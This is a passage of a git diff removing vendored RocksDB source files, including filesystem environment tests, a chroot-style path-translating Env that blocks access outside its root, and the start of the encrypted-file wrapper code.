-EnvOptions::EnvOptions(const DBOptions& options) {
-  AssignEnvOptions(this, options);
-}
-
-EnvOptions::EnvOptions() {
-  DBOptions options;
-  AssignEnvOptions(this, options);
-}
-
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/env/env_basic_test.cc b/thirdparty/rocksdb/env/env_basic_test.cc
deleted file mode 100644
index 254c71f..0000000
--- a/thirdparty/rocksdb/env/env_basic_test.cc
+++ /dev/null
@@ -1,356 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <memory>
-#include <string>
-#include <vector>
-#include <algorithm>
-
-#include "env/mock_env.h"
-#include "rocksdb/env.h"
-#include "rocksdb/utilities/object_registry.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-// Normalizes trivial differences across Envs such that these test cases can
-// run on all Envs.
-class NormalizingEnvWrapper : public EnvWrapper {
- public:
-  explicit NormalizingEnvWrapper(Env* base) : EnvWrapper(base) {}
-
-  // Removes . and .. from directory listing
-  virtual Status GetChildren(const std::string& dir,
-                             std::vector<std::string>* result) override {
-    Status status = EnvWrapper::GetChildren(dir, result);
-    if (status.ok()) {
-      result->erase(std::remove_if(result->begin(), result->end(),
-                                   [](const std::string& s) {
-                                     return s == "." || s == "..";
-                                   }),
-                    result->end());
-    }
-    return status;
-  }
-
-  // Removes . and .. from directory listing
-  virtual Status GetChildrenFileAttributes(
-      const std::string& dir, std::vector<FileAttributes>* result) override {
-    Status status = EnvWrapper::GetChildrenFileAttributes(dir, result);
-    if (status.ok()) {
-      result->erase(std::remove_if(result->begin(), result->end(),
-                                   [](const FileAttributes& fa) {
-                                     return fa.name == "." || fa.name == "..";
-                                   }),
-                    result->end());
-    }
-    return status;
-  }
-};
-
-class EnvBasicTestWithParam : public testing::Test,
-                              public ::testing::WithParamInterface<Env*> {
- public:
-  Env* env_;
-  const EnvOptions soptions_;
-  std::string test_dir_;
-
-  EnvBasicTestWithParam() : env_(GetParam()) {
-    test_dir_ = test::TmpDir(env_) + "/env_basic_test";
-  }
-
-  void SetUp() {
-    env_->CreateDirIfMissing(test_dir_);
-  }
-
-  void TearDown() {
-    std::vector<std::string> files;
-    env_->GetChildren(test_dir_, &files);
-    for (const auto& file : files) {
-      // don't know whether it's file or directory, try both. The tests must
-      // only create files or empty directories, so one must succeed, else the
-      // directory's corrupted.
-      Status s = env_->DeleteFile(test_dir_ + "/" + file);
-      if (!s.ok()) {
-        ASSERT_OK(env_->DeleteDir(test_dir_ + "/" + file));
-      }
-    }
-  }
-};
-
-class EnvMoreTestWithParam : public EnvBasicTestWithParam {};
-
-static std::unique_ptr<Env> def_env(new NormalizingEnvWrapper(Env::Default()));
-INSTANTIATE_TEST_CASE_P(EnvDefault, EnvBasicTestWithParam,
-                        ::testing::Values(def_env.get()));
-INSTANTIATE_TEST_CASE_P(EnvDefault, EnvMoreTestWithParam,
-                        ::testing::Values(def_env.get()));
-
-static std::unique_ptr<Env> mock_env(new MockEnv(Env::Default()));
-INSTANTIATE_TEST_CASE_P(MockEnv, EnvBasicTestWithParam,
-                        ::testing::Values(mock_env.get()));
-#ifndef ROCKSDB_LITE
-static std::unique_ptr<Env> mem_env(NewMemEnv(Env::Default()));
-INSTANTIATE_TEST_CASE_P(MemEnv, EnvBasicTestWithParam,
-                        ::testing::Values(mem_env.get()));
-
-namespace {
-
-// Returns a vector of 0 or 1 Env*, depending whether an Env is registered for
-// TEST_ENV_URI.
-//
-// The purpose of returning an empty vector (instead of nullptr) is that gtest
-// ValuesIn() will skip running tests when given an empty collection.
-std::vector<Env*> GetCustomEnvs() {
-  static Env* custom_env;
-  static std::unique_ptr<Env> custom_env_guard;
-  static bool init = false;
-  if (!init) {
-    init = true;
-    const char* uri = getenv("TEST_ENV_URI");
-    if (uri != nullptr) {
-      custom_env = NewCustomObject<Env>(uri, &custom_env_guard);
-    }
-  }
-
-  std::vector<Env*> res;
-  if (custom_env != nullptr) {
-    res.emplace_back(custom_env);
-  }
-  return res;
-}
-
-}  // anonymous namespace
-
-INSTANTIATE_TEST_CASE_P(CustomEnv, EnvBasicTestWithParam,
-                        ::testing::ValuesIn(GetCustomEnvs()));
-
-INSTANTIATE_TEST_CASE_P(CustomEnv, EnvMoreTestWithParam,
-                        ::testing::ValuesIn(GetCustomEnvs()));
-
-#endif  // ROCKSDB_LITE
-
-TEST_P(EnvBasicTestWithParam, Basics) {
-  uint64_t file_size;
-  unique_ptr<WritableFile> writable_file;
-  std::vector<std::string> children;
-
-  // Check that the directory is empty.
-  ASSERT_EQ(Status::NotFound(), env_->FileExists(test_dir_ + "/non_existent"));
-  ASSERT_TRUE(!env_->GetFileSize(test_dir_ + "/non_existent", &file_size).ok());
-  ASSERT_OK(env_->GetChildren(test_dir_, &children));
-  ASSERT_EQ(0U, children.size());
-
-  // Create a file.
-  ASSERT_OK(env_->NewWritableFile(test_dir_ + "/f", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Close());
-  writable_file.reset();
-
-  // Check that the file exists.
-  ASSERT_OK(env_->FileExists(test_dir_ + "/f"));
-  ASSERT_OK(env_->GetFileSize(test_dir_ + "/f", &file_size));
-  ASSERT_EQ(0U, file_size);
-  ASSERT_OK(env_->GetChildren(test_dir_, &children));
-  ASSERT_EQ(1U, children.size());
-  ASSERT_EQ("f", children[0]);
-  ASSERT_OK(env_->DeleteFile(test_dir_ + "/f"));
-
-  // Write to the file.
-  ASSERT_OK(
-      env_->NewWritableFile(test_dir_ + "/f1", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append("abc"));
-  ASSERT_OK(writable_file->Close());
-  writable_file.reset();
-  ASSERT_OK(
-      env_->NewWritableFile(test_dir_ + "/f2", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Close());
-  writable_file.reset();
-
-  // Check for expected size.
-  ASSERT_OK(env_->GetFileSize(test_dir_ + "/f1", &file_size));
-  ASSERT_EQ(3U, file_size);
-
-  // Check that renaming works.
-  ASSERT_TRUE(
-      !env_->RenameFile(test_dir_ + "/non_existent", test_dir_ + "/g").ok());
-  ASSERT_OK(env_->RenameFile(test_dir_ + "/f1", test_dir_ + "/g"));
-  ASSERT_EQ(Status::NotFound(), env_->FileExists(test_dir_ + "/f1"));
-  ASSERT_OK(env_->FileExists(test_dir_ + "/g"));
-  ASSERT_OK(env_->GetFileSize(test_dir_ + "/g", &file_size));
-  ASSERT_EQ(3U, file_size);
-
-  // Check that renaming overwriting works
-  ASSERT_OK(env_->RenameFile(test_dir_ + "/f2", test_dir_ + "/g"));
-  ASSERT_OK(env_->GetFileSize(test_dir_ + "/g", &file_size));
-  ASSERT_EQ(0U, file_size);
-
-  // Check that opening non-existent file fails.
-  unique_ptr<SequentialFile> seq_file;
-  unique_ptr<RandomAccessFile> rand_file;
-  ASSERT_TRUE(!env_->NewSequentialFile(test_dir_ + "/non_existent", &seq_file,
-                                       soptions_)
-                   .ok());
-  ASSERT_TRUE(!seq_file);
-  ASSERT_TRUE(!env_->NewRandomAccessFile(test_dir_ + "/non_existent",
-                                         &rand_file, soptions_)
-                   .ok());
-  ASSERT_TRUE(!rand_file);
-
-  // Check that deleting works.
-  ASSERT_TRUE(!env_->DeleteFile(test_dir_ + "/non_existent").ok());
-  ASSERT_OK(env_->DeleteFile(test_dir_ + "/g"));
-  ASSERT_EQ(Status::NotFound(), env_->FileExists(test_dir_ + "/g"));
-  ASSERT_OK(env_->GetChildren(test_dir_, &children));
-  ASSERT_EQ(0U, children.size());
-  ASSERT_TRUE(
-      env_->GetChildren(test_dir_ + "/non_existent", &children).IsNotFound());
-}
-
-TEST_P(EnvBasicTestWithParam, ReadWrite) {
-  unique_ptr<WritableFile> writable_file;
-  unique_ptr<SequentialFile> seq_file;
-  unique_ptr<RandomAccessFile> rand_file;
-  Slice result;
-  char scratch[100];
-
-  ASSERT_OK(env_->NewWritableFile(test_dir_ + "/f", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append("hello "));
-  ASSERT_OK(writable_file->Append("world"));
-  ASSERT_OK(writable_file->Close());
-  writable_file.reset();
-
-  // Read sequentially.
-  ASSERT_OK(env_->NewSequentialFile(test_dir_ + "/f", &seq_file, soptions_));
-  ASSERT_OK(seq_file->Read(5, &result, scratch));  // Read "hello".
-  ASSERT_EQ(0, result.compare("hello"));
-  ASSERT_OK(seq_file->Skip(1));
-  ASSERT_OK(seq_file->Read(1000, &result, scratch));  // Read "world".
-  ASSERT_EQ(0, result.compare("world"));
-  ASSERT_OK(seq_file->Read(1000, &result, scratch));  // Try reading past EOF.
-  ASSERT_EQ(0U, result.size());
-  ASSERT_OK(seq_file->Skip(100));  // Try to skip past end of file.
-  ASSERT_OK(seq_file->Read(1000, &result, scratch));
-  ASSERT_EQ(0U, result.size());
-
-  // Random reads.
-  ASSERT_OK(env_->NewRandomAccessFile(test_dir_ + "/f", &rand_file, soptions_));
-  ASSERT_OK(rand_file->Read(6, 5, &result, scratch));  // Read "world".
-  ASSERT_EQ(0, result.compare("world"));
-  ASSERT_OK(rand_file->Read(0, 5, &result, scratch));  // Read "hello".
-  ASSERT_EQ(0, result.compare("hello"));
-  ASSERT_OK(rand_file->Read(10, 100, &result, scratch));  // Read "d".
-  ASSERT_EQ(0, result.compare("d"));
-
-  // Too high offset.
-  ASSERT_TRUE(rand_file->Read(1000, 5, &result, scratch).ok());
-}
-
-TEST_P(EnvBasicTestWithParam, Misc) {
-  unique_ptr<WritableFile> writable_file;
-  ASSERT_OK(env_->NewWritableFile(test_dir_ + "/b", &writable_file, soptions_));
-
-  // These are no-ops, but we test they return success.
-  ASSERT_OK(writable_file->Sync());
-  ASSERT_OK(writable_file->Flush());
-  ASSERT_OK(writable_file->Close());
-  writable_file.reset();
-}
-
-TEST_P(EnvBasicTestWithParam, LargeWrite) {
-  const size_t kWriteSize = 300 * 1024;
-  char* scratch = new char[kWriteSize * 2];
-
-  std::string write_data;
-  for (size_t i = 0; i < kWriteSize; ++i) {
-    write_data.append(1, static_cast<char>(i));
-  }
-
-  unique_ptr<WritableFile> writable_file;
-  ASSERT_OK(env_->NewWritableFile(test_dir_ + "/f", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append("foo"));
-  ASSERT_OK(writable_file->Append(write_data));
-  ASSERT_OK(writable_file->Close());
-  writable_file.reset();
-
-  unique_ptr<SequentialFile> seq_file;
-  Slice result;
-  ASSERT_OK(env_->NewSequentialFile(test_dir_ + "/f", &seq_file, soptions_));
-  ASSERT_OK(seq_file->Read(3, &result, scratch));  // Read "foo".
-  ASSERT_EQ(0, result.compare("foo"));
-
-  size_t read = 0;
-  std::string read_data;
-  while (read < kWriteSize) {
-    ASSERT_OK(seq_file->Read(kWriteSize - read, &result, scratch));
-    read_data.append(result.data(), result.size());
-    read += result.size();
-  }
-  ASSERT_TRUE(write_data == read_data);
-  delete [] scratch;
-}
-
-TEST_P(EnvMoreTestWithParam, GetModTime) {
-  ASSERT_OK(env_->CreateDirIfMissing(test_dir_ + "/dir1"));
-  uint64_t mtime1 = 0x0;
-  ASSERT_OK(env_->GetFileModificationTime(test_dir_ + "/dir1", &mtime1));
-}
-
-TEST_P(EnvMoreTestWithParam, MakeDir) {
-  ASSERT_OK(env_->CreateDir(test_dir_ + "/j"));
-  ASSERT_OK(env_->FileExists(test_dir_ + "/j"));
-  std::vector<std::string> children;
-  env_->GetChildren(test_dir_, &children);
-  ASSERT_EQ(1U, children.size());
-  // fail because file already exists
-  ASSERT_TRUE(!env_->CreateDir(test_dir_ + "/j").ok());
-  ASSERT_OK(env_->CreateDirIfMissing(test_dir_ + "/j"));
-  ASSERT_OK(env_->DeleteDir(test_dir_ + "/j"));
-  ASSERT_EQ(Status::NotFound(), env_->FileExists(test_dir_ + "/j"));
-}
-
-TEST_P(EnvMoreTestWithParam, GetChildren) {
-  // empty folder returns empty vector
-  std::vector<std::string> children;
-  std::vector<Env::FileAttributes> childAttr;
-  ASSERT_OK(env_->CreateDirIfMissing(test_dir_));
-  ASSERT_OK(env_->GetChildren(test_dir_, &children));
-  ASSERT_OK(env_->FileExists(test_dir_));
-  ASSERT_OK(env_->GetChildrenFileAttributes(test_dir_, &childAttr));
-  ASSERT_EQ(0U, children.size());
-  ASSERT_EQ(0U, childAttr.size());
-
-  // folder with contents returns relative path to test dir
-  ASSERT_OK(env_->CreateDirIfMissing(test_dir_ + "/niu"));
-  ASSERT_OK(env_->CreateDirIfMissing(test_dir_ + "/you"));
-  ASSERT_OK(env_->CreateDirIfMissing(test_dir_ + "/guo"));
-  ASSERT_OK(env_->GetChildren(test_dir_, &children));
-  ASSERT_OK(env_->GetChildrenFileAttributes(test_dir_, &childAttr));
-  ASSERT_EQ(3U, children.size());
-  ASSERT_EQ(3U, childAttr.size());
-  for (auto each : children) {
-    env_->DeleteDir(test_dir_ + "/" + each);
-  }  // necessary for default POSIX env
-
-  // non-exist directory returns IOError
-  ASSERT_OK(env_->DeleteDir(test_dir_));
-  ASSERT_TRUE(!env_->FileExists(test_dir_).ok());
-  ASSERT_TRUE(!env_->GetChildren(test_dir_, &children).ok());
-  ASSERT_TRUE(!env_->GetChildrenFileAttributes(test_dir_, &childAttr).ok());
-
-  // if dir is a file, returns IOError
-  ASSERT_OK(env_->CreateDir(test_dir_));
-  unique_ptr<WritableFile> writable_file;
-  ASSERT_OK(
-      env_->NewWritableFile(test_dir_ + "/file", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Close());
-  writable_file.reset();
-  ASSERT_TRUE(!env_->GetChildren(test_dir_ + "/file", &children).ok());
-  ASSERT_EQ(0U, children.size());
-}
-
-}  // namespace rocksdb
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/env/env_chroot.cc b/thirdparty/rocksdb/env/env_chroot.cc
deleted file mode 100644
index 6a1fda8..0000000
--- a/thirdparty/rocksdb/env/env_chroot.cc
+++ /dev/null
@@ -1,324 +0,0 @@
-//  Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#if !defined(ROCKSDB_LITE) && !defined(OS_WIN)
-
-#include "env/env_chroot.h"
-
-#include <errno.h>
-#include <stdlib.h>
-#include <string.h>
-#include <unistd.h>
-
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class ChrootEnv : public EnvWrapper {
- public:
-  ChrootEnv(Env* base_env, const std::string& chroot_dir)
-      : EnvWrapper(base_env) {
-#if defined(OS_AIX)
-    char resolvedName[PATH_MAX];
-    char* real_chroot_dir = realpath(chroot_dir.c_str(), resolvedName);
-#else
-    char* real_chroot_dir = realpath(chroot_dir.c_str(), nullptr);
-#endif
-    // chroot_dir must exist so realpath() returns non-nullptr.
-    assert(real_chroot_dir != nullptr);
-    chroot_dir_ = real_chroot_dir;
-#if !defined(OS_AIX)
-    free(real_chroot_dir);
-#endif
-  }
-
-  virtual Status NewSequentialFile(const std::string& fname,
-                                   std::unique_ptr<SequentialFile>* result,
-                                   const EnvOptions& options) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::NewSequentialFile(status_and_enc_path.second, result,
-                                         options);
-  }
-
-  virtual Status NewRandomAccessFile(const std::string& fname,
-                                     unique_ptr<RandomAccessFile>* result,
-                                     const EnvOptions& options) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::NewRandomAccessFile(status_and_enc_path.second, result,
-                                           options);
-  }
-
-  virtual Status NewWritableFile(const std::string& fname,
-                                 unique_ptr<WritableFile>* result,
-                                 const EnvOptions& options) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::NewWritableFile(status_and_enc_path.second, result,
-                                       options);
-  }
-
-  virtual Status ReuseWritableFile(const std::string& fname,
-                                   const std::string& old_fname,
-                                   unique_ptr<WritableFile>* result,
-                                   const EnvOptions& options) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    auto status_and_old_enc_path = EncodePath(old_fname);
-    if (!status_and_old_enc_path.first.ok()) {
-      return status_and_old_enc_path.first;
-    }
-    return EnvWrapper::ReuseWritableFile(status_and_old_enc_path.second,
-                                         status_and_old_enc_path.second, result,
-                                         options);
-  }
-
-  virtual Status NewRandomRWFile(const std::string& fname,
-                                 unique_ptr<RandomRWFile>* result,
-                                 const EnvOptions& options) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::NewRandomRWFile(status_and_enc_path.second, result,
-                                       options);
-  }
-
-  virtual Status NewDirectory(const std::string& dir,
-                              unique_ptr<Directory>* result) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(dir);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::NewDirectory(status_and_enc_path.second, result);
-  }
-
-  virtual Status FileExists(const std::string& fname) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::FileExists(status_and_enc_path.second);
-  }
-
-  virtual Status GetChildren(const std::string& dir,
-                             std::vector<std::string>* result) override {
-    auto status_and_enc_path = EncodePath(dir);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::GetChildren(status_and_enc_path.second, result);
-  }
-
-  virtual Status GetChildrenFileAttributes(
-      const std::string& dir, std::vector<FileAttributes>* result) override {
-    auto status_and_enc_path = EncodePath(dir);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::GetChildrenFileAttributes(status_and_enc_path.second,
-                                                 result);
-  }
-
-  virtual Status DeleteFile(const std::string& fname) override {
-    auto status_and_enc_path = EncodePath(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::DeleteFile(status_and_enc_path.second);
-  }
-
-  virtual Status CreateDir(const std::string& dirname) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(dirname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::CreateDir(status_and_enc_path.second);
-  }
-
-  virtual Status CreateDirIfMissing(const std::string& dirname) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(dirname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::CreateDirIfMissing(status_and_enc_path.second);
-  }
-
-  virtual Status DeleteDir(const std::string& dirname) override {
-    auto status_and_enc_path = EncodePath(dirname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::DeleteDir(status_and_enc_path.second);
-  }
-
-  virtual Status GetFileSize(const std::string& fname,
-                             uint64_t* file_size) override {
-    auto status_and_enc_path = EncodePath(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::GetFileSize(status_and_enc_path.second, file_size);
-  }
-
-  virtual Status GetFileModificationTime(const std::string& fname,
-                                         uint64_t* file_mtime) override {
-    auto status_and_enc_path = EncodePath(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::GetFileModificationTime(status_and_enc_path.second,
-                                               file_mtime);
-  }
-
-  virtual Status RenameFile(const std::string& src,
-                            const std::string& dest) override {
-    auto status_and_src_enc_path = EncodePath(src);
-    if (!status_and_src_enc_path.first.ok()) {
-      return status_and_src_enc_path.first;
-    }
-    auto status_and_dest_enc_path = EncodePathWithNewBasename(dest);
-    if (!status_and_dest_enc_path.first.ok()) {
-      return status_and_dest_enc_path.first;
-    }
-    return EnvWrapper::RenameFile(status_and_src_enc_path.second,
-                                  status_and_dest_enc_path.second);
-  }
-
-  virtual Status LinkFile(const std::string& src,
-                          const std::string& dest) override {
-    auto status_and_src_enc_path = EncodePath(src);
-    if (!status_and_src_enc_path.first.ok()) {
-      return status_and_src_enc_path.first;
-    }
-    auto status_and_dest_enc_path = EncodePathWithNewBasename(dest);
-    if (!status_and_dest_enc_path.first.ok()) {
-      return status_and_dest_enc_path.first;
-    }
-    return EnvWrapper::LinkFile(status_and_src_enc_path.second,
-                                status_and_dest_enc_path.second);
-  }
-
-  virtual Status LockFile(const std::string& fname, FileLock** lock) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    // FileLock subclasses may store path (e.g., PosixFileLock stores it). We
-    // can skip stripping the chroot directory from this path because callers
-    // shouldn't use it.
-    return EnvWrapper::LockFile(status_and_enc_path.second, lock);
-  }
-
-  virtual Status GetTestDirectory(std::string* path) override {
-    // Adapted from PosixEnv's implementation since it doesn't provide a way to
-    // create directory in the chroot.
-    char buf[256];
-    snprintf(buf, sizeof(buf), "/rocksdbtest-%d", static_cast<int>(geteuid()));
-    *path = buf;
-
-    // Directory may already exist, so ignore return
-    CreateDir(*path);
-    return Status::OK();
-  }
-
-  virtual Status NewLogger(const std::string& fname,
-                           shared_ptr<Logger>* result) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::NewLogger(status_and_enc_path.second, result);
-  }
-
-  virtual Status GetAbsolutePath(const std::string& db_path,
-                                 std::string* output_path) override {
-    auto status_and_enc_path = EncodePath(db_path);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::GetAbsolutePath(status_and_enc_path.second, output_path);
-  }
-
- private:
-  // Returns status and expanded absolute path including the chroot directory.
-  // Checks whether the provided path breaks out of the chroot. If it returns
-  // non-OK status, the returned path should not be used.
-  std::pair<Status, std::string> EncodePath(const std::string& path) {
-    if (path.empty() || path[0] != '/') {
-      return {Status::InvalidArgument(path, "Not an absolute path"), ""};
-    }
-    std::pair<Status, std::string> res;
-    res.second = chroot_dir_ + path;
-#if defined(OS_AIX)
-    char resolvedName[PATH_MAX];
-    char* normalized_path = realpath(res.second.c_str(), resolvedName);
-#else
-    char* normalized_path = realpath(res.second.c_str(), nullptr);
-#endif
-    if (normalized_path == nullptr) {
-      res.first = Status::NotFound(res.second, strerror(errno));
-    } else if (strlen(normalized_path) < chroot_dir_.size() ||
-               strncmp(normalized_path, chroot_dir_.c_str(),
-                       chroot_dir_.size()) != 0) {
-      res.first = Status::IOError(res.second,
-                                  "Attempted to access path outside chroot");
-    } else {
-      res.first = Status::OK();
-    }
-#if !defined(OS_AIX)
-    free(normalized_path);
-#endif
-    return res;
-  }
-
-  // Similar to EncodePath() except assumes the basename in the path hasn't been
-  // created yet.
-  std::pair<Status, std::string> EncodePathWithNewBasename(
-      const std::string& path) {
-    if (path.empty() || path[0] != '/') {
-      return {Status::InvalidArgument(path, "Not an absolute path"), ""};
-    }
-    // Basename may be followed by trailing slashes
-    size_t final_idx = path.find_last_not_of('/');
-    if (final_idx == std::string::npos) {
-      // It's only slashes so no basename to extract
-      return EncodePath(path);
-    }
-
-    // Pull off the basename temporarily since realname(3) (used by
-    // EncodePath()) requires a path that exists
-    size_t base_sep = path.rfind('/', final_idx);
-    auto status_and_enc_path = EncodePath(path.substr(0, base_sep + 1));
-    status_and_enc_path.second.append(path.substr(base_sep + 1));
-    return status_and_enc_path;
-  }
-
-  std::string chroot_dir_;
-};
-
-Env* NewChrootEnv(Env* base_env, const std::string& chroot_dir) {
-  if (!base_env->FileExists(chroot_dir).ok()) {
-    return nullptr;
-  }
-  return new ChrootEnv(base_env, chroot_dir);
-}
-
-}  // namespace rocksdb
-
-#endif  // !defined(ROCKSDB_LITE) && !defined(OS_WIN)
diff --git a/thirdparty/rocksdb/env/env_chroot.h b/thirdparty/rocksdb/env/env_chroot.h
deleted file mode 100644
index b2760bc..0000000
--- a/thirdparty/rocksdb/env/env_chroot.h
+++ /dev/null
@@ -1,22 +0,0 @@
-//  Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#if !defined(ROCKSDB_LITE) && !defined(OS_WIN)
-
-#include <string>
-
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-// Returns an Env that translates paths such that the root directory appears to
-// be chroot_dir. chroot_dir should refer to an existing directory.
-Env* NewChrootEnv(Env* base_env, const std::string& chroot_dir);
-
-}  // namespace rocksdb
-
-#endif  // !defined(ROCKSDB_LITE) && !defined(OS_WIN)
diff --git a/thirdparty/rocksdb/env/env_encryption.cc b/thirdparty/rocksdb/env/env_encryption.cc
deleted file mode 100644
index 6b688a6..0000000
--- a/thirdparty/rocksdb/env/env_encryption.cc
+++ /dev/null
@@ -1,909 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <algorithm>
-#include <cctype>
-#include <iostream>
-
-#include "rocksdb/env_encryption.h"
-#include "util/aligned_buffer.h"
-#include "util/coding.h"
-#include "util/random.h"
-
-#endif
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-
-class EncryptedSequentialFile : public SequentialFile {
-  private:
-    std::unique_ptr<SequentialFile> file_;
-    std::unique_ptr<BlockAccessCipherStream> stream_;
-    uint64_t offset_;
-    size_t prefixLength_;
-
-     public:
-  // Default ctor. Given underlying sequential file is supposed to be at
-  // offset == prefixLength.
-  EncryptedSequentialFile(SequentialFile* f, BlockAccessCipherStream* s, size_t prefixLength)
-      : file_(f), stream_(s), offset_(prefixLength), prefixLength_(prefixLength) {
-  }
-
-  // Read up to "n" bytes from the file.  "scratch[0..n-1]" may be
-  // written by this routine.  Sets "*result" to the data that was
-  // read (including if fewer than "n" bytes were successfully read).
-  // May set "*result" to point at data in "scratch[0..n-1]", so
-  // "scratch[0..n-1]" must be live when "*result" is used.
-  // If an error was encountered, returns a non-OK status.
-  //
-  // REQUIRES: External synchronization
-  virtual Status Read(size_t n, Slice* result, char* scratch) override {
-    assert(scratch);
-    Status status = file_->Read(n, result, scratch);
-    if (!status.ok()) {
-      return status;
-    }
-    status = stream_->Decrypt(offset_, (char*)result->data(), result->size());
-    offset_ += result->size(); // We've already ready data from disk, so update offset_ even if decryption fails.
-    return status;
-  }
-
-  // Skip "n" bytes from the file. This is guaranteed to be no
-  // slower that reading the same data, but may be faster.
-  //
-  // If end of file is reached, skipping will stop at the end of the
-  // file, and Skip will return OK.
-  //
-  // REQUIRES: External synchronization
-  virtual Status Skip(uint64_t n) override {
-    auto status = file_->Skip(n);
-    if (!status.ok()) {
-      return status;
-    }
-    offset_ += n;
-    return status;
-  }
-
-  // Indicates the upper layers if the current SequentialFile implementation
-  // uses direct IO.
-  virtual bool use_direct_io() const override { 
-    return file_->use_direct_io(); 
-  }
-
-  // Use the returned alignment value to allocate
-  // aligned buffer for Direct I/O
-  virtual size_t GetRequiredBufferAlignment() const override { 
-    return file_->GetRequiredBufferAlignment(); 
-  }
-
-  // Remove any kind of caching of data from the offset to offset+length
-  // of this file. If the length is 0, then it refers to the end of file.
-  // If the system is not caching the file contents, then this is a noop.
-  virtual Status InvalidateCache(size_t offset, size_t length) override {
-    return file_->InvalidateCache(offset + prefixLength_, length);
-  }
-
-  // Positioned Read for direct I/O
-  // If Direct I/O enabled, offset, n, and scratch should be properly aligned
-  virtual Status PositionedRead(uint64_t offset, size_t n, Slice* result, char* scratch) override {
-    assert(scratch);
-    offset += prefixLength_; // Skip prefix
-    auto status = file_->PositionedRead(offset, n, result, scratch);
-    if (!status.ok()) {
-      return status;
-    }
-    offset_ = offset + result->size();
-    status = stream_->Decrypt(offset, (char*)result->data(), result->size());
-    return status;
-  }
-
-};
-
-// A file abstraction for randomly reading the contents of a file.
-class EncryptedRandomAccessFile : public RandomAccessFile {
-  private:
-    std::unique_ptr<RandomAccessFile> file_;
-    std::unique_ptr<BlockAccessCipherStream> stream_;
-    size_t prefixLength_;
-
- public:
-  EncryptedRandomAccessFile(RandomAccessFile* f, BlockAccessCipherStream* s, size_t prefixLength)
-    : file_(f), stream_(s), prefixLength_(prefixLength) { }
-
-  // Read up to "n" bytes from the file starting at "offset".
-  // "scratch[0..n-1]" may be written by this routine.  Sets "*result"
-  // to the data that was read (including if fewer than "n" bytes were
-  // successfully read).  May set "*result" to point at data in
-  // "scratch[0..n-1]", so "scratch[0..n-1]" must be live when
-  // "*result" is used.  If an error was encountered, returns a non-OK
-  // status.
-  //
-  // Safe for concurrent use by multiple threads.
-  // If Direct I/O enabled, offset, n, and scratch should be aligned properly.
-  virtual Status Read(uint64_t offset, size_t n, Slice* result, char* scratch) const override {
-    assert(scratch);
-    offset += prefixLength_;
-    auto status = file_->Read(offset, n, result, scratch);
-    if (!status.ok()) {
-      return status;
